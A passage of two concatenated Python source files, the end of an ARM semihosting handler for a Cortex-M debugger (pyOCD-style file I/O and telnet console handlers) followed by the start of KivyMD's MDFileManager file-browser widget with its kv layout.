TARGET_SYS_SYSTEM = 0x12
TARGET_SYS_ERRNO = 0x13
TARGET_SYS_GET_CMDLINE = 0x15
TARGET_SYS_HEAPINFO = 0x16
angel_SWIreason_EnterSVC = 0x17
TARGET_SYS_EXIT = 0x18 # Also called angel_SWIreason_ReportException
TARGET_SYS_ELAPSED = 0x30
TARGET_SYS_TICKFREQ = 0x31
# Pseudo-file descriptor numbers. The fds must be non-zero according to the
# ARM semihosting spec.
STDIN_FD = 1
STDOUT_FD = 2
STDERR_FD = 3
## Maximum length of a null-terminated string we'll attempt to read from target memory.
#
# The length is limited in case the string isn't terminated.
#
# @see SemihostAgent::_get_string()
MAX_STRING_LENGTH = 2048
##
# @brief Interface for semihosting file I/O handlers.
#
# This class is also used as the default I/O handler if none is provided to SemihostAgent.
# In this case, all file I/O requests are rejected.
class SemihostIOHandler(object):
def __init__(self):
self.agent = None
self._errno = 0
def cleanup(self):
pass
@property
def errno(self):
return self._errno
## @brief Helper for standard I/O open requests.
#
# In the ARM semihosting spec, standard I/O files are opened using a filename of ":tt"
# with the open mode specifying which standard I/O file to open. This method takes care
# of these special open requests, and is intended to be used by concrete I/O handler
# subclasses.
#
# @return A 2-tuple of the file descriptor and filename. The filename is returned so it
# only has to be read from target memory once if the request is not for standard I/O.
# The returned file descriptor may be one of 0, 1, or 2 for the standard I/O files,
# -1 if an invalid combination was requested, or None if the request was not for
# a standard I/O file (i.e., the filename was not ":tt"). If None is returned for the
# file descriptor, the caller must handle the open request.
def _std_open(self, fnptr, fnlen, mode):
filename = self.agent._get_string(fnptr, fnlen)
logging.debug("Semihost: open '%s' mode %s", filename, mode)
# Handle standard I/O.
if filename == ':tt':
if mode == 'r':
fd = STDIN_FD
elif mode == 'w':
fd = STDOUT_FD
elif mode == 'a':
fd = STDERR_FD
else:
logging.warning("Unrecognized semihosting console open file combination: mode=%s", mode)
return -1, filename
return fd, filename
return None, filename
def open(self, fnptr, fnlen, mode):
raise NotImplementedError()
def close(self, fd):
raise NotImplementedError()
def write(self, fd, ptr, length):
raise NotImplementedError()
def read(self, fd, ptr, length):
raise NotImplementedError()
def readc(self):
raise NotImplementedError()
def istty(self, fd):
raise NotImplementedError()
def seek(self, fd, pos):
raise NotImplementedError()
def flen(self, fd):
raise NotImplementedError()
def remove(self, ptr, length):
raise NotImplementedError()
def rename(self, oldptr, oldlength, newptr, newlength):
raise NotImplementedError()
##
# @brief Implements semihosting requests directly in the Python process.
#
# This class maintains its own list of pseudo-file descriptors for files opened by the
# debug target. By default, this class uses the system stdin, stdout, and stderr file objects
# for file desscriptors 1, 2, and 3.
class InternalSemihostIOHandler(SemihostIOHandler):
def __init__(self):
super(InternalSemihostIOHandler, self).__init__()
self.next_fd = STDERR_FD + 1
# Go ahead and connect standard I/O.
self.open_files = {
STDIN_FD : sys.stdin,
STDOUT_FD : sys.stdout,
STDERR_FD : sys.stderr
}
def _is_valid_fd(self, fd):
return self.open_files.has_key(fd) and self.open_files[fd] is not None
def cleanup(self):
for f in (self.open_files[k] for k in self.open_files if k > STDERR_FD):
f.close()
def open(self, fnptr, fnlen, mode):
fd, filename = self._std_open(fnptr, fnlen, mode)
if fd is not None:
return fd
try:
fd = self.next_fd
self.next_fd += 1
f = io.open(filename, mode)
self.open_files[fd] = f
return fd
except IOError as e:
self._errno = e.errno
logging.error("Semihost: failed to open file '%s'", filename)
traceback.print_exc()
return -1
def close(self, fd):
if fd > STDERR_FD:
if not self._is_valid_fd(fd):
return -1
f = self.open_files.pop(fd)
try:
f.close()
except OSError:
# Ignore errors closing files.
pass
return 0
def write(self, fd, ptr, length):
if not self._is_valid_fd(fd):
# Return byte count not written.
return length
data = self.agent._get_string(ptr, length)
try:
f = self.open_files[fd]
if 'b' not in f.mode:
data = unicode(data)
f.write(data)
f.flush()
return 0
except IOError as e:
self._errno = e.errno
logging.debug("Semihost: exception: %s", e)
return -1
def read(self, fd, ptr, length):
if not self._is_valid_fd(fd):
# Return byte count not read.
return length
try:
f = self.open_files[fd]
data = f.read(length)
if 'b' not in f.mode:
data = data.encode()
except IOError as e:
self._errno = e.errno
logging.debug("Semihost: exception: %s", e)
return -1
data = bytearray(data)
self.agent.target.writeBlockMemoryUnaligned8(ptr, data)
return length - len(data)
def readc(self):
try:
f = self.open_files[STDIN_FD]
if f is not None:
data = f.read(1)
if 'b' not in f.mode:
data = data.encode()
return data
else:
return 0
except OSError as e:
self._errno = e.errno
return 0
def istty(self, fd):
if not self._is_valid_fd(fd):
return -1
# Just assume that stdio is a terminal and other files aren't.
return int(not fd > STDERR_FD)
def seek(self, fd, pos):
if not self._is_valid_fd(fd):
return -1
try:
self.open_files[fd].seek(pos)
return 0
except IOError as e:
self._errno = e.errno
return -1
def flen(self, fd):
if not self._is_valid_fd(fd):
return -1
try:
info = os.fstat(self.open_files[fd].fileno())
return info.st_size
except OSError as e:
self._errno = e.errno
return -1
##
# @brief Serves a telnet connection for semihosting.
#
# Not all semihost requests are support. This class is meant to be used only for the
# debug console. Pass an instance for the @i console parameter of the SemihostAgent
# constructor.
#
# The server thread will automatically be started by the constructor. To shut down the
# server and its thread, call the stop() method.
class TelnetSemihostIOHandler(SemihostIOHandler):
def __init__(self, port_or_url, serve_local_only=True):
super(TelnetSemihostIOHandler, self).__init__()
self._abstract_socket = None
self._wss_server = None
self._port = 0
if isinstance(port_or_url, str) == True:
self._wss_server = port_or_url
self._abstract_socket = GDBWebSocket(self._wss_server)
else:
self._port = port_or_url
self._abstract_socket = GDBSocket(self._port, 4096)
if serve_local_only:
self._abstract_socket.host = 'localhost'
self._buffer = bytearray()
self._buffer_lock = threading.Lock()
self.connected = None
self._shutdown_event = threading.Event()
self._thread = threading.Thread(target=self._server, name="semihost-telnet")
self._thread.daemon = True
self._thread.start()
def stop(self):
self._shutdown_event.set()
self._thread.join()
def _server(self):
logging.info("Telnet: server started on port %s", str(self._port))
self.connected = None
try:
while not self._shutdown_event.is_set():
# Wait for a client to connect.
# TODO support multiple client connections
while not self._shutdown_event.is_set():
self.connected = self._abstract_socket.connect()
if self.connected is not None:
logging.debug("Telnet: client connected")
break
if self._shutdown_event.is_set():
break
# Set timeout on new connection.
self._abstract_socket.setTimeout(0.1)
# Keep reading from the client until we either get a shutdown event, or
# the client disconnects. The incoming data is appended to our read buffer.
while not self._shutdown_event.is_set():
try:
data = self._abstract_socket.read()
if len(data) == 0:
# Client disconnected.
self._abstract_socket.close()
self.connected = None
break
self._buffer_lock.acquire()
self._buffer += bytearray(data)
self._buffer_lock.release()
except socket.timeout:
pass
finally:
self._abstract_socket.close()
logging.info("Telnet: server stopped")
def write(self, fd, ptr, length):
# If nobody is connected, act like all data was written anyway.
if self.connected is None:
return 0
data = self.agent._get_string(ptr, length)
remaining = len(data)
while remaining:
count = self._abstract_socket.write(data)
remaining -= count
if remaining:
data = data[count:]
return 0
## @brief Extract requested amount of data from the read buffer.
def _get_input(self, length):
self._buffer_lock.acquire()
try:
actualLength = min(length, len(self._buffer))
if actualLength:
data = self._buffer[:actualLength]
self._buffer = self._buffer[actualLength:]
else:
data = bytearray()
return data
finally:
self._buffer_lock.release()
def read(self, fd, ptr, length):
if self.connected is None:
return -1
# Extract requested amount of data from the read buffer.
data = self._get_input(length)
# Stuff data into provided buffer.
if data:
self.agent.target.writeBlockMemoryUnaligned8(ptr, data)
result = length - len(data)
if not data:
self._errno = 5
return -1
return result
def readc(self):
if self.connected is None:
return -1
data = self._get_input(1)
if data:
return data[0]
else:
return -1
##
# @brief Handler for ARM semihosting requests.
#
# Semihosting requests are made by the target by executing a 'bkpt #0xab' instruction. The
# requested operation is specified by R0 and any arguments by R1. Many requests use a block
# of word-sized arguments pointed to by R1. The return value is passed back to the target
# in R0.
#
# This class does not handle any file-related requests by itself. It uses I/O handler objects
# passed in to the constructor. The requests handled directly by this class are #TARGET_SYS_CLOCK
# and #TARGET_SYS_TIME.
#
# There are two types of I/O handlers used by this class. The main I/O handler, set
# with the constructor's @i io_handler parameter, is used for most file operations.
# You may optionally pass another I/O handler for the @i console constructor parameter. The
# console handler is used solely for standard I/O and debug console I/O requests. If no console
# handler is provided, the main handler is used instead. TARGET_SYS_OPEN requests are not
# passed to the console handler in any event, they are always passed to the main handler.
#
# If no main I/O handler is provided, the class will use SemihostIOHandler, which causes all
# file I/O requests to be rejected as an error.
#
# The SemihostAgent assumes standard I/O file descriptor numbers are #STDIN_FD, #STDOUT_FD,
# and #STDERR_FD. When it receives a read or write request for one of these descriptors, it
# passes the request to the console handler. This means the main handler must return these
# numbers for standard I/O open requests (those with a file name of ":tt").
#
# Not all semihosting requests are supported. Those that are not implemented are:
# - TARGET_SYS_TMPNAM
# - TARGET_SYS_SYSTEM
# - TARGET_SYS_GET_CMDLINE
# - TARGET_SYS_HEAPINFO
# - TARGET_SYS_EXIT
# - TARGET_SYS_ELAPSED
# - TARGET_SYS_TICKFREQ
class SemihostAgent(object):
## Index into this array is the file open mode argument to TARGET_SYS_OPEN.
OPEN_MODES = ['r', 'rb', 'r+', 'r+b', 'w', 'wb', 'w+', 'w+b', 'a', 'ab', 'a+', 'a+b']
EPOCH = datetime.datetime(1970, 1, 1)
def __init__(self, target, io_handler=None, console=None):
self.target = target
self.start_time = time.time()
self.io_handler = io_handler or SemihostIOHandler()
self.io_handler.agent = self
self.console = console or self.io_handler
self.console.agent = self
self.request_map = {
TARGET_SYS_OPEN : self.handle_sys_open,
TARGET_SYS_CLOSE : self.handle_sys_close,
TARGET_SYS_WRITEC : self.handle_sys_writec,
TARGET_SYS_WRITE0 : self.handle_sys_write0,
TARGET_SYS_WRITE : self.handle_sys_write,
TARGET_SYS_READ : self.handle_sys_read,
TARGET_SYS_READC : self.handle_sys_readc,
TARGET_SYS_ISERROR : self.handle_sys_iserror,
TARGET_SYS_ISTTY : self.handle_sys_istty,
TARGET_SYS_SEEK : self.handle_sys_seek,
TARGET_SYS_FLEN : self.handle_sys_flen,
TARGET_SYS_TMPNAM : self.handle_sys_tmpnam,
TARGET_SYS_REMOVE : self.handle_sys_remove,
TARGET_SYS_RENAME : self.handle_sys_rename,
TARGET_SYS_CLOCK : self.handle_sys_clock,
TARGET_SYS_TIME : self.handle_sys_time,
TARGET_SYS_SYSTEM : self.handle_sys_system,
TARGET_SYS_ERRNO : self.handle_sys_errno,
TARGET_SYS_GET_CMDLINE : self.handle_sys_get_cmdline,
TARGET_SYS_HEAPINFO : self.handle_sys_heapinfo,
TARGET_SYS_EXIT : self.handle_sys_exit,
TARGET_SYS_ELAPSED : self.handle_sys_elapsed,
TARGET_SYS_TICKFREQ : self.handle_sys_tickfreq
}
## @brief Handle a semihosting request.
#
# This method should be called after the target has halted, to check if the halt was
# due to a semihosting request. It first checks to see if the target halted because
# of a breakpoint. If so, it reads the instruction at PC to make sure it is a 'bkpt #0xAB'
# instruction. If so, the target is making a semihosting request. If not, nothing more is done.
#
# After the request is handled, the PC is advanced to the next instruction after the 'bkpt'.
# A boolean is return indicating whether a semihosting request was handled. If True, the
# caller should resume the target immediately.
#
# @retval True A semihosting request was handled.
# @retval False The target halted for a reason other than semihosting, i.e. a user-installed
# debugging breakpoint.
def check_and_handle_semihost_request(self):
# Nothing to do if this is not a bkpt.
if (self.target.read32(pyOCD.coresight.cortex_m.CortexM.DFSR) &
pyOCD.coresight.cortex_m.CortexM.DFSR_BKPT) == 0:
return False
pc = self.target.readCoreRegister('pc')
# Are we stopped due to one of our own breakpoints?
bp = self.target.findBreakpoint(pc)
if bp:
return False
# Get the instruction at the breakpoint.
instr = self.target.read16(pc)
# Check for semihost bkpt.
if instr != BKPT_INSTR:
return False
# Advance PC beyond the bkpt instruction.
self.target.writeCoreRegister('pc', pc + 2)
# Get args
op = self.target.readCoreRegister('r0')
args = self.target.readCoreRegister('r1')
# Handle request
handler = self.request_map.get(op, None)
if handler:
try:
result = handler(args)
except NotImplementedError:
logging.warning("Semihost: unimplemented request pc=%x r0=%x r1=%x", pc, op, args)
result = -1
except Exception as e:
logging.warning("Exception while handling semihost request: %s", e)
traceback.print_exc(e)
result = -1
else:
result = -1
# Set return value.
self.target.writeCoreRegister('r0', result)
return True
## @brief Clean up any resources allocated by semihost requests.
#
# @note May be called more than once.
def cleanup(self):
self.io_handler.cleanup()
if self.console is not self.io_handler:
self.console.cleanup()
def _get_args(self, args, count):
args = self.target.readBlockMemoryAligned32(args, count)
if count == 1:
return args[0]
else:
return args
def _get_string(self, ptr, length=None):
if length is not None:
data = self.target.readBlockMemoryUnaligned8(ptr, length)
return str(bytearray(data))
target_str = ''
# TODO - use memory map to make sure we don't try to read off the end of memory
# Limit string size in case it isn't terminated.
while len(target_str) < MAX_STRING_LENGTH:
try:
# Read 32 bytes at a time for efficiency.
data = self.target.readBlockMemoryUnaligned8(ptr, 32)
terminator = data.index(0)
# Found a null terminator, append data up to but not including the null
# and then exit the loop.
target_str += str(bytearray(data[:terminator]))
break
except DAPAccess.TransferError:
# Failed to read some or all of the string.
break
except ValueError:
# No null terminator was found. Append all of data.
target_str += str(bytearray(data))
ptr += 32
return target_str
def handle_sys_open(self, args):
fnptr, mode, fnlen = self._get_args(args, 3)
if mode >= len(self.OPEN_MODES):
return -1
mode = self.OPEN_MODES[mode]
if LOG_SEMIHOST:
logging.debug("Semihost: open %x/%x, mode %s", fnptr, fnlen, mode)
return self.io_handler.open(fnptr, fnlen, mode)
def handle_sys_close(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: close fd=%d", fd)
return self.io_handler.close(fd)
def handle_sys_writec(self, args):
if LOG_SEMIHOST:
logging.debug("Semihost: writec %x", args)
return self.console.write(STDOUT_FD, args, 1)
def handle_sys_write0(self, args):
msg = self._get_string(args)
if LOG_SEMIHOST:
logging.debug("Semihost: write0 msg='%s'", msg)
return self.console.write(STDOUT_FD, args, len(msg))
def handle_sys_write(self, args):
fd, data_ptr, length = self._get_args(args, 3)
if LOG_SEMIHOST:
logging.debug("Semihost: write fd=%d ptr=%x len=%d", fd, data_ptr, length)
if fd in (STDOUT_FD, STDERR_FD):
return self.console.write(fd, data_ptr, length)
else:
return self.io_handler.write(fd, data_ptr, length)
def handle_sys_read(self, args):
fd, ptr, length = self._get_args(args, 3)
if LOG_SEMIHOST:
logging.debug("Semihost: read fd=%d ptr=%x len=%d", fd, ptr, length)
if fd == STDIN_FD:
return self.console.read(fd, ptr, length)
else:
return self.io_handler.read(fd, ptr, length)
def handle_sys_readc(self, args):
if LOG_SEMIHOST:
logging.debug("Semihost: readc")
return self.console.readc()
def handle_sys_iserror(self, args):
raise NotImplementedError()
def handle_sys_istty(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: istty fd=%d", fd)
return self.io_handler.istty(fd)
def handle_sys_seek(self, args):
fd, pos = self._get_args(args, 2)
if LOG_SEMIHOST:
logging.debug("Semihost: seek fd=%d pos=%d", fd, pos)
return self.io_handler.seek(fd, pos)
def handle_sys_flen(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: flen fd=%d", fd)
return self.io_handler.flen(fd)
def handle_sys_tmpnam(self, args):
raise NotImplementedError()
def handle_sys_remove(self, args):
ptr, length = self._get_args(args, 2)
return self.io_handler.remove(ptr, length)
def handle_sys_rename(self, args):
oldptr, oldlength, newptr, newlength = self._get_args(args, 4)
return self.io_handler.rename(oldptr, oldlength, newptr, newlength)
def handle_sys_clock(self, args):
now = time.time()
delta = now - self.start_time
return int(delta * 100)
def handle_sys_time(self, args):
now = datetime.datetime.now()
delta = now - self.EPOCH
seconds = (delta.days * 86400) + delta.seconds
return seconds
def handle_sys_system(self, args):
raise NotImplementedError()
def handle_sys_errno(self, args):
return self.io_handler.errno
def handle_sys_get_cmdline(self, args):
raise NotImplementedError()
def handle_sys_heapinfo(self, args):
raise NotImplementedError()
def handle_sys_exit(self, args):
raise NotImplementedError()
def handle_sys_elapsed(self, args):
raise NotImplementedError()
def handle_sys_tickfreq(self, args):
raise NotImplementedError()
|
filemanager.py
|
"""
File Manager
============
Copyright (c) 2019 Ivanov Yuri
For suggestions and questions:
<kivydevelopment@gmail.com>
This file is distributed under the terms of the same license,
as the Kivy framework.
A simple manager for selecting directories and files.
Example
-------
from kivymd.app import MDApp
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.modalview import ModalView
from kivymd.uix.filemanager import MDFileManager
from kivymd.theming import ThemeManager
from kivymd.toast import toast
Builder.load_string('''
<ExampleFileManager@BoxLayout>
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: app.title
left_action_items: [['menu', lambda x: None]]
elevation: 10
md_bg_color: app.theme_cls.primary_color
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
''')
class Example(MDApp):
title = "File Manage"
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.manager = None
def build(self):
return Factory.ExampleFileManager()
def file_manager_open(self):
if not self.manager:
self.manager = ModalView(size_hint=(1, 1), auto_dismiss=False)
self.file_manager = MDFileManager(
exit_manager=self.exit_manager, select_path=self.select_path)
self.manager.add_widget(self.file_manager)
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
self.manager.open()
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager.dismiss()
self.manager_open = False
def events(self, instance, keyboard, keycode, text, modifiers):
'''Called when buttons are pressed on the mobile device..'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
import os
import threading
from PIL import Image
from kivy.app import App
from kivy.metrics import dp
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.image import AsyncImage
from kivy.properties import (
ObjectProperty,
StringProperty,
ListProperty,
BooleanProperty,
NumericProperty,
OptionProperty,
)
import kivymd.material_resources as m_res
from kivymd import images_path
from kivymd.uix.list import (
ILeftBodyTouch,
ILeftBody,
IRightBody,
IRightBodyTouch,
)
from kivymd.uix.button import MDIconButton
from kivymd.font_definitions import theme_font_styles
from kivymd.uix.behaviors import (
RectangularRippleBehavior,
CircularRippleBehavior,
)
from kivymd.theming import ThemableBehavior
ACTIVITY_MANAGER = """
#:import os os
#:import Window kivy.core.window.Window
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
access_string: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconFolder:
disabled: True
icon: root.icon
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
GridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols*self.spacing[0])/self.cols
row_force_default: True
size_hint_y: None
height: self.minimum_height
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_1, root.paths, 1, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text:
os.path.split(root.paths[0])[1].replace('thumb_', '')\
if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_2, root.paths, 2, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_2.text))
LabelContent:
id: label_box_2
text:
os.path.split(root.paths[1])[1].replace('thumb_', '')\
if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_3, root.paths, 3, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_3.text))
LabelContent:
id: label_box_3
text:
os.path.split(root.paths[2])[1].replace('thumb_', '')\
if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size:dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
canvas:
Color:
rgba:
1, 1, 1, 1
Rectangle:
size: self.size
pos: self.pos
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
md_bg_color: root.theme_cls.primary_color
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root.update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedBaseListItem>
size_hint_y: None
canvas:
Color:
rgba:
self.theme_cls.divider_color if root.divider is not None\
else (0, 0, 0, 0)
Line:
points: (root.x ,root.y, root.x+self.width, root.y)\
if root.divider == 'Full' else\
(root.x+root._txt_left_pad, root.y,\
root.x+self.width-root._txt_left_pad-root._txt_right_pad,\
root.y)
BoxLayout:
id: _text_container
orientation: 'vertical'
pos: root.pos
padding:
root._txt_left_pad, root._txt_top_pad,\
root._txt_right_pad, root._txt_bot_pad
MDLabel:
id: _lbl_primary
text: root.text
font_style: root.font_style
theme_text_color: root.theme_text_color
size_hint_y: None
shorten: True
max_lines: 1
height: self.texture_size[1]
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height/2 - self.height/2
size: dp(48), dp(48)
"""
class IconButton(CircularRippleBehavior, ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedBaseListItem(
ThemableBehavior, RectangularRippleBehavior, ButtonBehavior, FloatLayout
):
"""Base class to all ListItems. Not supposed to be instantiated on its own.
"""
text = StringProperty()
"""Text shown in the first line.
:attr:`text` is a :class:`~kivy.properties.StringProperty` and defaults
to "".
"""
text_color = ListProperty(None)
"""Text color used if theme_text_color is set to 'Custom'"""
font_style = OptionProperty("Subtitle1", options=theme_font_styles)
theme_text_color = StringProperty("Primary", allownone=True)
"""Theme text color for primary text"""
secondary_text = StringProperty()
"""Text shown in the second and potentially third line.
The text will wrap into the third line if the ListItem's type is set to
\'one-line\'. It can be forced into the third line by adding a \\n
escape sequence.
:attr:`secondary_text` is a :class:`~kivy.properties.StringProperty` and
defaults to "".
"""
secondary_text_color = ListProperty(None)
"""Text color used for secondary text if secondary_theme_text_color
is set to 'Custom'"""
secondary_theme_text_color = StringProperty("Secondary", allownone=True)
"""Theme text color for secondary primary text"""
secondary_font_style = OptionProperty("Body1", options=theme_font_styles)
divider = OptionProperty(
"Full", options=["Full", "Inset", None], allownone=True
)
_txt_left_pad = NumericProperty(dp(16))
_txt_top_pad = NumericProperty()
_txt_bot_pad = NumericProperty()
_txt_right_pad = NumericProperty(m_res.HORIZ_MARGINS)
_num_lines = 2
class ModifiedOneLineListItem(ModifiedBaseListItem):
"""A one line list item"""
_txt_top_pad = NumericProperty(dp(16))
_txt_bot_pad = NumericProperty(dp(15)) # dp(20) - dp(5)
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class ContainerSupport:
"""Overrides add_widget in a ListItem to include support for I*Body
widgets when the appropiate containers are present.
"""
_touchable_widgets = ListProperty()
def add_widget(self, widget, index=0):
if issubclass(widget.__class__, ILeftBody):
self.ids["_left_container"].add_widget(widget)
elif issubclass(widget.__class__, ILeftBodyTouch):
self.ids["_left_container"].add_widget(widget)
self._touchable_widgets.append(widget)
elif issubclass(widget.__class__, IRightBody):
self.ids["_right_container"].add_widget(widget)
elif issubclass(widget.__class__, IRightBodyTouch):
self.ids["_right_container"].add_widget(widget)
self._touchable_widgets.append(widget)
else:
return super().add_widget(widget)
def remove_widget(self, widget):
super().remove_widget(widget)
if widget in self._touchable_widgets:
self._touchable_widgets.remove(widget)
def on_touch_down(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, "down"):
return
super().on_touch_down(touch)
def on_touch_move(self, touch, *args):
if self.propagate_touch_to_touchable_widgets(touch, "move", *args):
return
super().on_touch_move(touch, *args)
def on_touch_up(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, "up"):
return
super().on_touch_up(touch)
def propagate_touch_to_touchable_widgets(self, touch, touch_event, *args):
triggered = False
for i in self._touchable_widgets:
if i.collide_point(touch.x, touch.y):
triggered = True
if touch_event == "down":
i.on_touch_down(touch)
elif touch_event == "move":
i.on_touch_move(touch, *args)
elif touch_event == "up":
i.on_touch_up(touch)
return triggered
class ModifiedOneLineIconListItem(ContainerSupport, ModifiedOneLineListItem):
_txt_left_pad = NumericProperty(dp(72))
class IconFolder(ILeftBodyTouch, MDIconButton):
pass
class BodyManagerWithPrevious(BoxLayout):
def get_source(
self, app, source_type, instance_label, paths, index, instance_content
):
if source_type == "folder" and instance_label.text != "":
source = f"{images_path}folder.png"
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f"{images_path}transparent.png"
return source
# FIXME: Add color for Black and White theme
# FIXME: When you first create the application cache,
# it crashes after a while with error:
"""
Traceback (most recent call last):
File "/home/kivy/Projects/KivyMD/demos/kitchen_sink/main.py", line 1698,
in <module>
KitchenSink().run()
File "/usr/lib/python3/dist-packages/kivy/app.py", line 826, in run
runTouchApp()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 502, in runTouchApp
EventLoop.window.mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 727, in mainloop
self._mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 460, in _mainloop
EventLoop.idle()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 337, in idle
Clock.tick()
File "/usr/lib/python3/dist-packages/kivy/clock.py", line 581, in tick
self._process_events()
File "kivy/_clock.pyx", line 384,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7839)
File "kivy/_clock.pyx", line 414,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7597)
File "kivy/_clock.pyx", line 412,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7519)
File "kivy/_clock.pyx", line 167,
in kivy._clock.ClockEvent.tick (kivy/_clock.c:3248)
File "/usr/lib/python3/dist-packages/kivy/cache.py",
line 212, in _purge_by_timeout
lastaccess = Cache._objects[category][key]['lastaccess']
KeyError: '/path/to/image'
"""
class MDFileManager(ThemableBehavior, FloatLayout):
icon = StringProperty("check")
"""The icon that will be used on the directory selection button."""
exit_manager = ObjectProperty(lambda x: None)
"""Function called when the user reaches directory tree root."""
select_path = ObjectProperty(lambda x: None)
"""Function, called when selecting a file/directory."""
ext = ListProperty()
"""List of file extensions to be displayed
in the manager. For example, ['py', 'kv'] - will filter out all files,
except python scripts and Kv Language."""
search = StringProperty("all")
"""It can take the values 'dirs' 'files' - display only directories
or only files. By default, it displays and folders, and files."""
current_path = StringProperty("/")
"""Current directory."""
use_access = BooleanProperty(True)
"""Show accec to files and directories."""
previous = BooleanProperty(False)
"""Shows only image previews."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
# If False - do not add a directory to the history -
# The user moves down the tree.
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = "Subtitle1"
if self.previous:
self.ext = [".png", ".jpg", ".jpeg"]
self.app = App.get_running_app()
if not os.path.exists("%s/thumb" % self.app.user_data_dir):
os.mkdir("%s/thumb" % self.app.user_data_dir)
else:
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon,
)
self.add_widget(action_button)
def update_list_images(self):
self.ids.rv.refresh_from_layout()
def split_list(self, l, n):
n = max(1, n)
return (l[i : i + n] for i in range(0, len(l), n))
def create_previous(self, path):
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = "%s/thumb/thumb_%s" % (
self.app.user_data_dir,
image,
)
if not os.path.exists(path_to_thumb):
im = Image.open(os.path.join(path, image))
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
def check_theme(self):
self.canvas.children[0].rgba = (
[0, 0, 0, 1]
if self.theme_cls.theme_style == "Dark"
else [1, 1, 1, 1]
)
def show(self, path):
"""Forms the body of a directory tree."""
self.check_theme()
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self.create_previous, args=(path,)).start()
split_dirs = self.split_list(dirs, 3)
split_files = self.split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []: # selected directory
pass
elif not dirs and not files: # directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"paths": list_dirs,
"type": "folder",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
for list_files in list(split_files):
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"paths": list_files,
"type": "files",
"events_callback": self.select_dir_or_file,
"height": dp(105),
